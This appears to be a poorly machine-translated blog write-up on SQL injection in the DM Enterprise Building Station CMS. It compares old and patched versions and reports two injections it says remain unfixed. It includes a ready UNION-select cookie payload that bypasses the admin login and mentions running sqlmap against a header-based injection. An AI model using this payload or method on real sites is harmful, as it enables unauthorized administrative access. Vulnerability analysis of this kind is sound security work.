DM Enterprise Building Station System v201710 SQL Injection Vulnerability Analysis | SQL injection still exists for new v201712

0x00 Preface

Originally, this set of CMS did not want to be examined. Download down to open a look, a variety of debug notes, typesetting rotten not.

Paste a few pages to see

It feels like a novice practiced hand, without the desire to go on trial.

But think, I TM is a novice ah, and then continue to look down.

Just a little bit. Several key points of Seay tool automatic examination. The discovery has injected, since has injected, took a good look.

Phpstorm,seay source code Audit, local demo set up ~

After reading, want to write a summary of the article, the title is written:

DM Enterprise Building Station system v201710 exists SQL injection

Probably because the code format does not want to write, or other reasons

。。。

I do not know how many minutes later, did not intend to see the CNVD on the report of the system has been submitted, but also two?!

That's a decision to make a smooth system.

0x01 CNVD reports and vendor patches

Let's see how the report on CNVD is written, right?

Submission time 10-23, very early ah ...

Get to a point where there is SQL injection at the background login ~

Looking at the other part of the story?

Oops, number 24th, you two really predestined.

The report should be a systematic review, and several parameters have been found. Even if the day wore, manufacturers also out of the patch.

The latest version is number 12.1th.

0X03 old and new versions comparison

Because I have seen the old version of the code, but also know that the old version of multi-parameter injection problem exists.

The previous version of the parameter filtering is using this function

This function is the author's custom, follow in

global.common.php

You will find that htmlentities is used to filter, note that the second parameter behind the function is ent_noquotes. What does that mean?

The function HTMLENTITIESDM filters only the <,> encoded as an entity character. the single and double quotes are perfectly ignored.

So what does this filter mean? Perhaps the author is trying to prevent XSS?!

In other words, the input that is filtered by this function is injected only if it is not filtered before it is brought to the database.

For example, CNVD's first report said, backstage login exists inject??

See Code login.php

Just use HTMLENTITIESDM filter a bit no longer filtered, directly into the database, injected into the leverage.

There is a second report that several parameters injected, afraid of using this function to filter the parameters of it, here is no longer to find.

Let's put our eyes on the new version.

Open artifact beyond Compare, load new and old two versions.

Will find that many changes have been made.

We straightforward directly to see global.common.php, see function HTMLENTITIESDM have to make changes?

Will find from Ent_noquotes into ent_quotes.

That is, never encode any quotation marks to encode all quotes.

In other words, this change has fixed all two holes in the CNVD.

login.php backstage Login injected into the

and other input parameters, are replaced with HTMLENTITDM to filter.

Not a few examples.

The new version of 0x04 still has SQL injection

After comparing the old and new versions, I began to laugh. Because I'm looking for a few SQL injection vulnerabilities, there is no fix.

Haha, I also have hand grip 0day time!

1, the common GetIP () function is not filtered or filtered, resulting in SQL injection

First look at the old version of the global.common.php, obviously there is no filtering

See where this function is used? Two locations found at the front desk

One of the file_formpost_concat is used to leave a message, file_order_post.php is used to order. ‘

In my test found that only the message this function can be used.

Look at the code, the old version is the content and Tokenhour parameters are injected

The new version has been filtered out.

But getting the IP here is not changing.

So here is the injection that can get a Boolean type. (because there is no return position)

Straight Sqlmap ran.

2, background authentication to determine the presence of injection, can directly bypass the landing

See the latest version of the background certification office admindm-yourname/config-a/common.inc2010.php

Nowo right old, you can see there is no change.

And let's take a closer look at this code:

Because the cookie here is controllable, we can inject it directly without even injecting a password, bypassing the login directly.

We analyze the code and we can draw such a conclusion.

Why is Userps also controllable? Because there is an injection here.

By injecting, we can allow the returned password to be entered for ourselves.

Then you can construct the cookie directly and log in as an administrator.

For example, we use PS 1, the ID is the cookie that injects the statement.

According to the formula

Usercookiecompare = USERID-MD5 (Userps,cookiesecet)

Construct the MD5 section first:

So our Usercookie is.

7 ' and 1=2 Union select Null,null,null,null,null,1,null,null,null,null,null,null,null #- 7b0bbade54ef65e2a830c034d0d14e61

Put three cookies on, access the/ADMINDM-YOURNAME/MOD_COMMON/INDEX-WELCOME.PHP?LANG=CN and go directly to the backstage

Time reason, no longer look at other issues.

There must be many other problems, the code is so messy, the odds of error increased a lot.

0X05 Summary

In general, this is a relatively simple CMS, suitable for our novice.

Do not know why so simple CMS, can also brush cnvd,cnvd really so simple?!

DM Enterprise Building Station System v201710 SQL Injection Vulnerability Analysis | SQL injection still exists for new v201712